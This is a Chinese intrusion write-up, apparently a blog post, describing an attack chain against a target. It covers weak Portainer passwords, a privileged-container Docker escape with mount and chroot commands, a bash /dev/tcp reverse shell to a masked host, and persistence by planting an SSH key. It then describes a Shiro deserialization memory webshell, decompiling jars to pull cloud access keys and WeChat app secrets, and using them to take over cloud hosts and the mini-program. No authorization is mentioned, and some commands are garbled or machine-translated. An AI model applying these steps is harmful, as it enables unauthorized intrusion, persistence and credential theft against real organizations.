记一次简单的Docker逃逸+反编译jar接管云主机

## 1. 想法

````html

Portainer弱口令-Docker转义-写入SSH公钥shiro反序列化-注入内存木马-反编译jar-接管云主机

````

## 2. 简单的Docker 转义

### 1.Protainer弱密码

Portainer是操作docker常用的图形化工具。它重量轻且易于使用。然而，许多Portainer的密码都很弱，例如：portainer/portainer；管理员/12345678； portainer/12345678等。注意密码长度差不多8个字符.

### 2.特权模式转义

使用弱口令进入portainer后，尝试挂载根目录逃逸失败，随后又尝试从Docker中进行特权模式逃逸。

添加集装箱：

以特权模式运行容器：

然后部署容器：

然后检查容器列表，确保容器正常运行：

以root 身份输入容器：

正常情况下很多命令不能使用：

首先查看当前磁盘分区情况并获取主机分区：

````bash

fdisk -l

``

获取主机磁盘为/dev/vda1

挂载主机磁盘:

````bash

mkdir li1u ----创建文件

mount /dev/vda1 /li1u/----挂载到文件

chroot /li1u/----在li1u根目录下运行

``

### 3.反弹壳

尝试弹壳:

````bash

bash -i /dev/tcp/xxx/8000 01

````

反弹成功：

### 4.写入SSH公钥

反弹shell成功后尝试写入ssh公钥维持小权限：

使用xshell生成用户密钥：

然后点击属性-公钥，复制公钥内容：

使用echo命令将公钥附加到authorized_keys：

catauthorized_keys添加成功：

尝试使用xshell连接（之前收集的信息显示ssh开放2021端口）

选择publickey（公钥登录）进行用户认证，通常用户名密码连接：

点击设置，选择刚刚生成的密钥，填写您设置的连接密码：

接下来是内网.

## 3.反编译jar并接管云主机

### 1.shiro反序列化-注意内存马

常规操作我就不多说了。输入冰蝎存储卡：

### 2.扩展结果（查找敏感信息）

连接后，尝试查找敏感信息：

早期收集的信息显示，目标是SpringBoot框架。 Spring的配置文件都是yml和properties。 Linux直接搜索指定后缀名的文件，并没有发现敏感信息。

````bash

查找/-名称*.yml .properties

````

### 3.反编译jar，获取大量配置信息

然后我转到网站根目录，在不同的文件夹下发现了三个jar包。它们应该全部打包到jar 中并运行。

直接将jar下载到本地电脑并反编译jar包：方法一：修改文件扩展名

修改jar扩展名为zip等，直接解压：

在clsses文件夹中，找到properties配置文件：

获取联系电话：

使用ak/sk应用工具或星云管理器导入云主机

OSS存储桶中发现大量敏感信息。

还有vx小程序的appid和secret，直接调用官方API即可：

````html

https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credentialappid=APPIDsecret=APPSECRET

````

还可以通过官方API获取小程序反馈、小程序用户访问数据、发送信息等，几乎可以接管小程序。方法二：jd-gui反编译jar

直接将jar包拖入jd-gui即可：同样的配置信息